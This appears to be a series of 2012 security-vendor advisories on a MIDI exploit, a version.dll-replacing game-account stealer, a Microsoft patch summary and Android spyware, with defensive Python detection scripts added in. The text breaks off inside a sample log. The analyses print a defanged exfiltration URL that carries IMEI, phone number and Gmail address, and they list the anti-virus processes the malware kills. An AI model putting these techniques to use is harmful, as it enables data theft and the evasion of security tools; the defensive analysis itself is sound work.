
1/27/2012

[Warning] Malicious files using MIDI exploit

1. Introduction

We found a malicious file that exploits MS12-004 (CVE-2012-0003), one of the Microsoft security updates released in January 2012.
The vulnerability is credited to Shane Garrett of IBM Security Systems X-Force Research; Microsoft released the fix on Jan 10, 2012.
It is a remote code execution vulnerability in winmm.dll, the Windows multimedia library used by media players.
Keeping Windows on the latest security updates protects against this exploit.
Users need to protect their PCs from this malicious file, which uses the MIDI remote code execution vulnerability.



2. Vulnerability information

When a media file crafted by an attacker is played, remote code execution is possible, and the attacker gains the same rights as the local user.

Microsoft Windows Media Could Allow Remote Code Execution
http://www.iss.net/threats/442.html

Vulnerabilities in Windows Media Could Allow Remote Code Execution
http://technet.microsoft.com/ko-kr/security/bulletin/MS12-004

Malware Leveraging MIDI Remote Code Execution Vulnerability Found
http://blog.trendmicro.com/malware-leveraging-midi-remote-code-execution-vulnerability-found/

The following list is the affected software.

- Windows XP SP3 Windows Multimedia Library
- Windows XP Media Center Edition 2005 SP3 Windows Multimedia Library
- Windows XP Media Center Edition 2005 SP3 Windows Multimedia Library and DirectShow
- Windows XP Professional x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 with SP2 for Itanium-based Systems Windows Multimedia Library and DirectShow
- Windows Vista SP2 Windows Multimedia Library and DirectShow
- Windows Vista x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for 32-bit Systems SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for x64-based Systems SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for Itanium-based Systems SP2 Windows Multimedia Library and DirectShow
- Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems SP1 DirectShow
- Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1 DirectShow
- Windows Server 2008 R2 for x64-based Systems DirectShow
- Windows Server 2008 R2 for x64-based Systems SP1 DirectShow
- Windows Server 2008 R2 for Itanium-based Systems DirectShow
- Windows Server 2008 R2 for Itanium-based Systems SP1 DirectShow

3. Malicious file using MIDI exploit

This file, first found under the name "mp.html", uses the MIDI vulnerability.
The name "mp" appears to be short for Media Player; the page embeds baby.mid, the file carrying the MIDI exploit, with an <object> tag.


It also runs ActiveXObject code from i.js (a JScript file) and stages the shellcode bytes in memory with JavaScript.

When baby.mid is loaded, the theme song of "TOTORO" (a Japanese animation) plays while the user's PC is being infected.


When the exploit triggers the shellcode, tdc.exe is downloaded from a specific web site.
The downloaded file is decoded in several steps, including XOR, and then executed.


When the malicious tdc.exe runs, it downloads "20120120.exe" from another external web site and executes it.

Our nProtect AVS 3.0 detects this file.
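The post says baby.mid carries the MIDI exploit but does not describe how the file is malformed. The checker below is an added example (not the ERT's analysis and not the page's own code): it walks a Standard MIDI File and reports the structural violations a triage analyst looks for in a suspect .mid, namely chunk lengths that run past end of file, a track count that disagrees with the header, and data bytes with the high bit set, which the SMF format forbids. It makes no claim about the exact trigger of CVE-2012-0003; the two sample files are constructed inline.

```python
import struct

def _vlq(data, pos):
    """Read a MIDI variable-length quantity (max 4 bytes); return (value, next_pos)."""
    value = 0
    for _ in range(4):
        b = data[pos]
        pos += 1
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            return value, pos
    raise ValueError("variable-length quantity longer than 4 bytes at %d" % pos)

def _check_track(data, pos, end, trk):
    """Walk one MTrk body; report bytes that violate the SMF event grammar."""
    findings = []
    status = None                        # running status (channel messages only)
    while pos < end:
        try:
            _, pos = _vlq(data, pos)     # delta time
            b = data[pos]
            if b & 0x80:                 # new status byte
                status, pos = b, pos + 1
            elif status is None:
                findings.append("track %d: data byte 0x%02x with no running status at %d" % (trk, b, pos))
                return findings
            if status == 0xFF:           # meta event: type, length, payload (cancels running status)
                n, pos = _vlq(data, pos + 1)
                pos, status = pos + n, None
            elif status in (0xF0, 0xF7):  # sysex: length, payload (cancels running status)
                n, pos = _vlq(data, pos)
                pos, status = pos + n, None
            elif 0x80 <= status <= 0xEF:  # channel message: 1 or 2 data bytes
                nbytes = 1 if (status & 0xF0) in (0xC0, 0xD0) else 2
                for i in range(nbytes):
                    d = data[pos + i]
                    if d & 0x80:         # data bytes must be 0..127 per the SMF spec
                        findings.append("track %d: status 0x%02x data byte %d is 0x%02x (>= 0x80) at %d"
                                        % (trk, status, i + 1, d, pos + i))
                pos += nbytes
            else:
                findings.append("track %d: unexpected status byte 0x%02x at %d" % (trk, status, pos))
                return findings
        except IndexError:
            findings.append("track %d: event truncated near offset %d" % (trk, pos))
            return findings
    return findings

def check_midi(data):
    """Return a list of findings (empty = structurally clean) for a Standard MIDI File."""
    if data[:4] != b"MThd" or len(data) < 14:
        return ["missing or short MThd header"]
    hdr_len, _fmt, ntrks, _division = struct.unpack_from(">IHHH", data, 4)
    findings = [] if hdr_len == 6 else ["MThd length %d (expected 6)" % hdr_len]
    pos, tracks = 8 + hdr_len, 0
    while pos + 8 <= len(data):
        tag = data[pos:pos + 4]
        length = struct.unpack_from(">I", data, pos + 4)[0]
        if pos + 8 + length > len(data):
            findings.append("chunk %s at %d claims %d bytes, past EOF" % (tag, pos, length))
            break
        if tag == b"MTrk":
            tracks += 1
            findings += _check_track(data, pos + 8, pos + 8 + length, tracks)
        pos += 8 + length
    if tracks != ntrks:
        findings.append("header declares %d track(s), file contains %d" % (ntrks, tracks))
    return findings

def build_smf(track_body, ntrks=1, division=96):
    """Constructed single-track SMF for the samples below (not a real malware sample)."""
    return (b"MThd" + struct.pack(">IHHH", 6, 0, ntrks, division)
            + b"MTrk" + struct.pack(">I", len(track_body)) + track_body)

# Constructed inputs: a one-note file, and the same file with a note number >= 0x80.
CLEAN_MIDI = build_smf(bytes.fromhex("00 90 3C 40 60 80 3C 40 00 FF 2F 00"))
BAD_NOTE_MIDI = build_smf(bytes.fromhex("00 90 FF 40 60 80 3C 40 00 FF 2F 00"))

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            for line in check_midi(f.read()) or ["clean"]:
                print("%s: %s" % (path, line))
```

Run it as `python midicheck.py suspect.mid`. A non-empty result only means the file breaks the format; decide whether that is an exploit attempt by looking at what the bad bytes are and where they sit, and remember that a spec-conformant player treats a high-bit byte in data position as a new status byte, so a flagged file may still play.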

4. How to prevent

This kind of malicious file targets as many users as possible by using the latest exploits.
To stay safe from it, keep your PC on the latest security updates.
Check not only the Microsoft web site but also the official web site of each product you use for security updates.


To use your PC safely despite these malicious attachments, we recommend installing the latest security updates and following the "Security management tips" below for general users.

Security management tips

1. Keep the OS and applications on the latest security updates.
2. Use anti-virus software from a trusted security company, keep its engine updated, and keep real-time detection on.
3. Do not open or download attachments from suspicious e-mails.
4. Be careful with links received via instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.

1/18/2012

[Warning] Malicious file changing version.dll

1. Introduction

On Jan 14, 2012, INCA Internet Security Response Center's Emergency Response Team detected a malicious file that replaces version.dll, a Windows system file, with a malicious copy, targeting domestic (Korean) users.
This kind of malicious file has appeared in several variants; the most recent one replaced ws2help.dll.
Since system files are loaded at boot, a malicious system file can cause an endless reboot loop.
These files spread mostly on weekends via popular file-sharing web sites and infect through various vulnerabilities.


 
Attackers target internet news sites, file-sharing services, and forums to reach users whose PCs have unpatched vulnerabilities.

[Warning] Malicious file which changes ws2help.dll(System file)
http://en-erteam.nprotect.com/2012/01/warning-malicious-file-which-changes.html 

It also keeps real-time statistics of infected users and collects OS version and anti-virus product information.

2. Infection details

This malicious file renames the original version.dll (Version Checking and File Installation Libraries) to version32.dll and puts a malicious file in its place. The malicious version.dll then has the system load version32.dll (the original) at boot so that nothing appears broken.

When the host (dropper) file is executed, it runs the following procedure and replaces the normal version.dll with the malicious one (observed on Windows XP SP3 Korean):

A. Creates a malicious file at C:\Windows\System32\safemon.dll
B. Creates a malicious file at C:\Documents and Settings\[user account]\Local Settings\Temp\201211891054.dll
* The dropped DLL's file name uses the format "yyyymmddhhmmss".

C. Renames the original version.dll to C:\Windows\System32\version32.dll
D. Copies C:\Windows\System32\201211891054.dll (the malicious file) over C:\Windows\System32\version.dll
* The normal version.dll is thereby replaced with the malicious version.dll.

E. Creates voor.bat, which deletes the host executable and then voor.bat itself.


The replacement version.dll forwards its exports to version32.dll, so the system keeps working at boot, while its own code tries to steal online game accounts.



The malicious safemon.dll registers itself as a BHO (Browser Helper Object) through the registry; in the process, existing BHO entries may be removed.
Once registered as a BHO, the malicious file is loaded whenever IE (Internet Explorer) runs.

- Function name : Browser Helper Object
- Data : IEHlprObj Class
- CLSID : {D36F9CA2-788F-42DE-A627-9E6EF40D8475}
- file name : C:\WINDOWS\system32\safemon.dll

- Register value : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}


The malicious safemon.dll is disguised as an update module of the ALYac product and tries to steal user accounts and passwords entered in the browser.


List of target sites

aion.plaync.jp
baram.nexon.com
booknlife.com
capogames.net
clubaudition.ndolfin.com
cultureland.co.kr
df.nexon.com
dragonnest.nexon.com
elsword.nexon.com
fifaonline.pmang.com
hangame.com
happymoney.co.kr
id.hangame.com
itembay.com
itemmania.com
maplestory.nexon.com
netmarble.net
plaync.co.kr
pmang.com
pmang.com/game_top.nwz?ssn
pmang.com/game_top.nwz?ssn=14
pmang.com/game_top.nwz?ssn=17
pmang.com/game_top.nwz?ssn=18
pmang.com/game_top.nwz?ssn=19
pmang.com/game_top.nwz?ssn=2
pmang.com/game_top.nwz?ssn=23
pmang.com/game_top.nwz?ssn=24
pmang.com/game_top.nwz?ssn=25
pmang.com/game_top.nwz?ssn=26
pmang.com/game_top.nwz?ssn=3
pmang.com/game_top.nwz?ssn=40
pmang.com/game_top.nwz?ssn=43
poker.hangame.com/baduki.nhn
poker.hangame.com/duelpoker.nhn
poker.hangame.com/highlow2.nhn
poker.hangame.com/hoola3.nhn
poker.hangame.com/laspoker.nhn
poker.hangame.com/poker7.nhn
samwinfo.capogames.net
teencash.co.kr
tera.hangame.com

The replacement version.dll also interferes with anti-virus software and tries to kill the following processes.

[Korean product]
- ALYac : AYAgent.aye, AYUpdSrv.aye, AYRTSrv.aye
- Naver : NaverAgent.exe
- AhnLab SiteGuard : SgRun.exe, SgSvc.exe, Sgui.exe
- AhnLab V3 Lite : V3LTray.exe, V3LRun.exe, V3LSvc.exe

[Overseas product]
- AVAST : AvastUI.exe, ashUpd.exe, AvastSvc.exe, avwsc.exe
- AVG : avgupd.exe, avgwdsvc.exe, avgfrw.exe, avgrsx.exe, avgnsx.exe, avgemc.exe, avgam.exe
- AVIRA : avupgsvc.exe, avscan.exe, avguard.exe, avcenter.exe, avgnt.exe
- BitDefender : bdreinit.exe, bdagent.exe, seccenter.exe, vsserv.exe, updatesrv.exe
- Kaspersky : avp.exe
- McAfee : UdaterUI.exe, Mctray.exe, shstat.exe
- Microsoft : msseces.exe
- Eset : ekrn.exe, egui.exe
- Symantec : Navw32.exe, ccSvcHst.exe

If ALYac or V3 is installed on the infected system, it moves their driver files to the temp folder, renaming them in sequence as SrMac(number).dat; see the file list below.

[V3 product]
- AhnFlt2k.sys
- AhnFltNt.sys
- AhnRec2k.sys
- AhnRecNt.sys
- AhnRghNt.sys
- ahnsze.sys
- v3core.sys
- v3engine.sys

[Alyac product]
- EstRtw.sys

3. How to prevent manually

Close applications that would interfere. Renaming the malicious files (changing their extension) and removing the malicious registry values cleans the infected PC.

A. Rename C:\Windows\System32\version.dll.
ex) version.dll -> version.dll-

Normal version.dll file : 18,994 bytes
Malicious version.dll file : 66,560 bytes (varies by variant)


B. WFP (Windows File Protection) will then restore the normal version.dll from C:\Windows\System32\dllcache\version.dll.


Since the malicious file (now version.dll-) is still loaded, it can only be deleted after a reboot.


C. safemon.dll is loaded into Explorer.exe, so it cannot be deleted immediately. To remove it, either force-kill Explorer.exe, or rename it as below, then reboot and delete it.
ex) safemon.dll -> safemon.dll-


D. Remove malicious registry values.



The following registry values need to be removed.

- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_DLL
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_ID
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj.1
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D36F9CA1-788F-42DE-A627-9E6EF40D8475}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{D36F9CA8-788F-42DE-A627-9E6EF40D8475}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}

E. Reboot and remove the following files.

- C:\Documents and Settings\user account\Local Settings\Temp\2012(mmddhhmmss).dll-
- C:\WINDOWS\system32\2012(mmddhhmmss).dll
- C:\WINDOWS\system32\safemon.dll-
- C:\WINDOWS\system32\version32.dll
- C:\WINDOWS\system32\version.dll-
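The manual steps above as a scripted checklist, added here as an example and not INCA's own tool. It takes the file and registry indicators from this post; the 18,994-byte size is the Korean XP SP3 figure quoted above and is only a hint, while comparing the hash of version.dll with the dllcache copy that WFP restores from is the reliable check. The assess() logic works on plain data so it can be exercised anywhere; collect_windows() gathers that data on a live XP-era host. An empty result means none of these indicators were seen, not that the machine is clean: variants change sizes and names.

```python
import hashlib, os, re

BHO_CLSID = "{D36F9CA2-788F-42DE-A627-9E6EF40D8475}"
REG_IOCS = (                                   # HKLM-relative keys from the removal list above
    r"SOFTWARE\Classes\CLSID\%s" % BHO_CLSID,
    r"SOFTWARE\Classes\IEHlprObj.IEHlprObj",
    r"SOFTWARE\Classes\IEHlprObj.IEHlprObj.1",
    r"SOFTWARE\Classes\Interface\{D36F9CA1-788F-42DE-A627-9E6EF40D8475}",
    r"SOFTWARE\Classes\TypeLib\{D36F9CA8-788F-42DE-A627-9E6EF40D8475}",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\%s" % BHO_CLSID,
)
# yyyymmddhhmmss.dll (the post's sample name has 12 digits), optionally already renamed to .dll-
TIMESTAMP_DLL = re.compile(r"^20\d{10,12}\.dll-?$", re.I)
NORMAL_VERSION_DLL_SIZE = 18994                # Korean XP SP3 figure quoted in the post
FILE_IOCS = {"version32.dll": "renamed original version.dll",
             "safemon.dll": "malicious BHO module",
             "safemon.dll-": "malicious BHO module (renamed, delete after reboot)"}

def assess(system32, temp, reg_present, dllcache_sha256=None):
    """system32/temp: {name: (size, sha256hex)}; reg_present: HKLM keys that exist.
    Returns [(severity, message)]; empty means none of the post's indicators were seen."""
    findings = []
    s32 = {k.lower(): v for k, v in system32.items()}
    if "version.dll" in s32:
        size, digest = s32["version.dll"]
        if dllcache_sha256 is not None:        # strongest check: compare with WFP's protected copy
            if digest != dllcache_sha256:
                findings.append(("high", "version.dll differs from dllcache\\version.dll"))
        elif size != NORMAL_VERSION_DLL_SIZE:  # weak fallback: the size hint from the post
            findings.append(("medium", "version.dll is %d bytes, expected %d" % (size, NORMAL_VERSION_DLL_SIZE)))
    for name, why in FILE_IOCS.items():
        if name in s32:
            findings.append(("high", "%s present: %s" % (name, why)))
    for name in list(s32) + [n.lower() for n in temp]:
        if TIMESTAMP_DLL.match(name):
            findings.append(("high", "timestamp-named DLL dropped: %s" % name))
    wanted = {k.lower() for k in REG_IOCS}
    for key in reg_present:
        if key.lower() in wanted:
            findings.append(("high", "registry IoC present: HKLM\\%s" % key))
    return findings

def collect_windows():
    """Gather assess() inputs on a live XP-era host (Windows only; dllcache does not exist on Vista+)."""
    import winreg
    root = os.environ.get("SystemRoot", r"C:\Windows")
    def listing(folder):
        out = {}
        for n in os.listdir(folder):
            p = os.path.join(folder, n)
            if os.path.isfile(p) and (n.lower() in FILE_IOCS or n.lower() == "version.dll"
                                      or TIMESTAMP_DLL.match(n)):
                with open(p, "rb") as f:
                    out[n] = (os.path.getsize(p), hashlib.sha256(f.read()).hexdigest())
        return out
    present = []
    for key in REG_IOCS:
        try:
            winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key))
            present.append(key)
        except OSError:
            pass
    cache = os.path.join(root, "system32", "dllcache", "version.dll")
    cache_hash = None
    if os.path.exists(cache):
        with open(cache, "rb") as f:
            cache_hash = hashlib.sha256(f.read()).hexdigest()
    return listing(os.path.join(root, "system32")), listing(os.environ.get("TEMP", ".")), present, cache_hash

if __name__ == "__main__":
    for sev, msg in assess(*collect_windows()) or [("info", "no indicators found")]:
        print("[%s] %s" % (sev, msg))
```

Run it before step A to confirm the infection and again after the reboot in step E to confirm the cleanup; the registry keys are only checked for existence, so remove them with regedit as the post describes.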

4. How to prevent

These malicious files cause various kinds of damage (including theft of online game account information and unexplained IE crashes during internet banking) and have a wide infection range.

Get the latest version at the following URL


To use your PC safely despite these malicious attachments, we recommend installing the latest security updates and following the "Security management tips" below for general users.

Security management tips

1. Keep the OS and applications on the latest security updates.
2. Use anti-virus software from a trusted security company, keep its engine updated, and keep real-time detection on.
3. Do not open or download attachments from suspicious e-mails.
4. Be careful with links received via instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.

1/11/2012

Microsoft Security Bulletin Summary for January 2012

1. Introduction

Microsoft (MS) released its regular security updates for January 2012.
Users of MS operating systems are strongly recommended to update to be safe from the Windows Kernel SafeSEH Bypass Vulnerability, Object Packager Insecure Executable Launching Vulnerability, CSRSS Elevation of Privilege Vulnerability, MIDI Remote Code Execution Vulnerability, DirectShow Remote Code Execution Vulnerability, Assembly Execution Vulnerability, SSL and TLS Protocols Vulnerability, and AntiXSS Library Bypass Vulnerability.



2. Update details

[Important]
[MS12-001] Vulnerability in Windows Kernel Could Allow Security Feature Bypass (2644615)

Vulnerability: Windows Kernel SafeSEH Bypass Vulnerability- CVE-2012-0001

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow an attacker to bypass the SafeSEH security feature in a software application. An attacker could then use other vulnerabilities to leverage the structured exception handler to run arbitrary code. Only software applications that were compiled using Microsoft Visual C++ .NET 2003 can be used to exploit this vulnerability.

Affected software

- Windows XP Professional x64 Edition SP2
- Windows Server 2003 SP2
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 SP2 Itanium-based
- Windows Vista SP1
- Windows Vista SP2
- Windows Vista x64 Edition SP2
- Windows Server 2008 for 32bit and Windows 2008 for 32bit SP2
- Windows Server 2008 for x64-based and Windows Server 2008 for x64-based SP2
- Windows Server 2008 for Itanium-based and Windows Server 2008 for Itanium SP2
- Windows 7 for 32-bit and Windows 7 for 32bit SP1
- Windows 7 for x64-based and Windows 7 for x64-based SP1
- Windows Server 2008 R2 for x64-based and Windows Server 2008 R2 for x64-based SP1
- Windows Server 2008 R2 for Itanium-based and Windows Server 2008 R2 for Itanium SP1

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-001



[Important]
[MS12-002] Vulnerability in Windows Object Packager Could Allow Remote Code Execution (2603381)

Vulnerability: Object Packager Insecure Executable Launching Vulnerability- CVE-2012-0009

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a legitimate file with an embedded packaged object that is located in the same network directory as a specially crafted executable file. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Affected software

- Windows XP SP3
- Windows XP Professional x64 Edition SP2
- Windows Server 2003 SP2
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 SP2 Itanium-based

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-002



[Important]
[MS12-003] Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2646524)

Vulnerability: CSRSS Elevation of Privilege Vulnerability- CVE-2012-0005

This security update resolves one privately reported vulnerability in Microsoft Windows. This security update is rated Important for all supported editions of Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. All supported editions of Windows 7 and Windows Server 2008 R2 are not affected by this vulnerability.

Affected software

- Windows XP SP3
- Windows XP Professional x64 Edition SP2
- Windows Server 2003 SP2
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 SP2 Itanium-based
- Windows Vista SP1
- Windows Vista SP2
- Windows Vista x64 Edition SP2
- Windows Server 2008 for 32bit and Windows 2008 for 32bit SP2
- Windows Server 2008 for x64-based and Windows Server 2008 for x64-based SP2
- Windows Server 2008 for Itanium-based and Windows Server 2008 for Itanium SP2

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-003



[Critical]
[MS12-004] Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391)

Vulnerability: MIDI Remote Code Execution Vulnerability- CVE-2012-0003
Vulnerability: DirectShow Remote Code Execution Vulnerability- CVE-2012-0004

This security update resolves two privately reported vulnerabilities in Microsoft Windows. The vulnerabilities could allow remote code execution if a user opens a specially crafted media file. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Affected software

- Windows XP SP3 Windows Multimedia Library
- Windows XP Media Center Edition 2005 SP3 Windows Multimedia Library
- Windows XP Media Center Edition 2005 SP3 Windows Multimedia Library and DirectShow
- Windows XP Professional x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 with SP2 for Itanium-based Systems Windows Multimedia Library and DirectShow
- Windows Vista SP2 Windows Multimedia Library and DirectShow
- Windows Vista x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for 32-bit Systems SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for x64-based Systems SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for Itanium-based Systems SP2 Windows Multimedia Library and DirectShow
- Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems SP1 DirectShow
- Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1 DirectShow
- Windows Server 2008 R2 for x64-based Systems DirectShow
- Windows Server 2008 R2 for x64-based Systems SP1 DirectShow
- Windows Server 2008 R2 for Itanium-based Systems DirectShow
- Windows Server 2008 R2 for Itanium-based Systems SP1 DirectShow

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-004



[Important]
[MS12-005] Vulnerability in Microsoft Windows Could Allow Remote Code Execution (2584146)

Vulnerability: Assembly Execution Vulnerability- CVE-2012-0013

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office file containing a malicious embedded ClickOnce application. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Affected software

- Windows XP SP3
- Windows XP Professional x64 Edition SP2
- Windows Server 2003 SP2
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 SP2 Itanium-based
- Windows Vista SP2
- Windows Vista x64 Edition SP2
- Windows Server 2008 for 32bit and Windows 2008 for 32bit SP2**
- Windows Server 2008 for x64-based and Windows Server 2008 for x64-based SP2**
- Windows Server 2008 for Itanium-based and Windows Server 2008 for Itanium SP2
- Windows 7 for 32-bit and Windows 7 for 32bit SP1
- Windows 7 for x64-based and Windows 7 for x64-based SP1
- Windows Server 2008 R2 for x64-based and Windows Server 2008 R2 for x64-based SP1**
- Windows Server 2008 R2 for Itanium-based and Windows Server 2008 R2 for Itanium SP1

**Server Core installation not affected. The vulnerabilities addressed by this update do not affect supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, when installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-005



[Critical]
[MS12-006] Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584)

Vulnerability: SSL and TLS Protocols Vulnerability- CVE-2011-3389

This security update resolves a publicly disclosed vulnerability in SSL 3.0 and TLS 1.0. This vulnerability affects the protocol itself and is not specific to the Windows operating system. The vulnerability could allow information disclosure if an attacker intercepts encrypted web traffic served from an affected system. TLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected.

Affected software

- Windows XP SP3
- Windows XP Professional x64 Edition SP2
- Windows Server 2003 SP2
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 SP2 Itanium-based
- Windows Vista SP2
- Windows Vista x64 Edition SP2
- Windows Server 2008 for 32bit and Windows 2008 for 32bit SP2
- Windows Server 2008 for x64-based and Windows Server 2008 for x64-based SP2
- Windows Server 2008 for Itanium-based and Windows Server 2008 for Itanium SP2
- Windows 7 for 32-bit and Windows 7 for 32bit SP1
- Windows 7 for x64-based and Windows 7 for x64-based SP1
- Windows Server 2008 R2 for x64-based and Windows Server 2008 R2 for x64-based SP1
- Windows Server 2008 R2 for Itanium-based and Windows Server 2008 R2 for Itanium SP1

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-006



[Important]
[MS12-007] Vulnerability in AntiXSS Library Could Allow Information Disclosure (2607664)

Vulnerability: AntiXSS Library Bypass Vulnerability- CVE-2012-0007

This security update resolves one privately reported vulnerability in the Microsoft Anti-Cross Site Scripting (AntiXSS) Library. The vulnerability could allow information disclosure if an attacker passes a malicious script to a website using the sanitization function of the AntiXSS Library. The consequences of the disclosure of that information depends on the nature of the information itself. Note that this vulnerability would not allow an attacker to execute code or to elevate the attacker's user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system. Only sites that use the sanitization module of the AntiXSS Library are affected by this vulnerability.

Affected software

- Microsoft Anti-Cross Site Scripting Library V3.x and Microsoft Anti-Cross Site Scripting Library V4.0

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-007

1/10/2012

[Warning] Android malicious file on Japanese porn site

1. Information

A few days ago, the spread of a malicious Android application through a file-sharing site was big news.
It was officially the first such case found. INCA Internet Security Response Center's Emergency Response Team has now detected a malicious file targeting Japanese users and wants to share it.
This malicious application shows the same symptoms as the one previously found in Korea.



Even if it has no overtly malicious purpose, collecting information without the user's consent can be harmful later.

[Information] Automatic detection and analysis system of malicious Android application
http://en-erteam.nprotect.com/2011/12/information-automatic-detection-and.html

2. Spreading path and symptoms of infection

No specific damage case has been reported in Korea for this malicious APK file; it is currently spreading on Japanese porn sites, and it has been added to our anti-virus patterns.

Spreading paths

- Direct URL link on a certain porn site
- Disguised as a required file on the distributor's web site




Clicking the URL on that site downloads the APK file.


The user downloads it from the Japanese porn site.


This malicious application requests the following permissions.


Permission explanation

- android:name="android.permission.GET_ACCOUNTS"
- android:name="android.permission.INTERNET"

After installation, the following launcher icon is created, but it has no name.


Symptoms of infection

After installation, running the malicious application redirects the user to a payment page.



The sequence of malicious behaviors is as follows.

Malicious behaviors

- Collects Google e-mail accounts
- Collects smartphone information including the IMEI and contacts
- Tries to leak them to an external site
- hxxp://(~).com/send.php?a_id=[IMEI]&telno=[telephone number]&m_addr=[Google Email account]&usr_id=[NULL]

It accesses the porn site at that address and registers a receiver with the following code.



The capture shows the receiver registration. The receiver checks for a certain service and, if that service is running, tries to leak data to the external site.



The following capture shows the dynamic debugging procedure. The information is sent to "hxxp://(~).com/send.php?a_id=[IMEI]&telno=[telephone number]&m_addr=[Google Email account]&usr_id=[NULL]".
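The leak URL above is the artifact that is visible on the network side. The script below is an added example (not part of the original post) that flags proxy log entries whose query string carries an IMEI-shaped value together with an e-mail address or phone number, which is the shape of the request shown. It keys on the value shapes rather than on the parameter names a_id/telno/m_addr, so a variant that renames them is still caught; the log lines, the log format and the host names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

IMEI_RE = re.compile(r"^\d{15}$")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[a-z]{2,}$", re.I)
PHONE_RE = re.compile(r"^\+?\d{9,15}$")

def luhn_ok(digits):
    """IMEI check digit (Luhn over all 15 digits) so random 15-digit numbers are not flagged.
    Drop this gate if you prefer recall over precision: malware may send junk IMEIs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def classify_query(url):
    """Map identifier kind -> names of the query parameters carrying it."""
    found = {}
    for key, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for v in values:
            if IMEI_RE.match(v) and luhn_ok(v):
                kind = "imei"
            elif EMAIL_RE.match(v):
                kind = "email"
            elif PHONE_RE.match(v):
                kind = "phone"
            else:
                continue
            found.setdefault(kind, []).append(key)
    return found

def is_exfil(url):
    """Device identity (IMEI) together with an account identifier in a single request."""
    f = classify_query(url)
    return "imei" in f and ("email" in f or "phone" in f)

# Constructed proxy log, "<time> <client> <method> <url>"; hosts are placeholders.
SAMPLE_LOG = """\
2012-01-10T09:12:01 10.0.0.7 GET http://example.invalid/index.html
2012-01-10T09:12:05 10.0.0.7 GET http://example.invalid/send.php?a_id=490154203237518&telno=08012345678&m_addr=victim%40gmail.com&usr_id=
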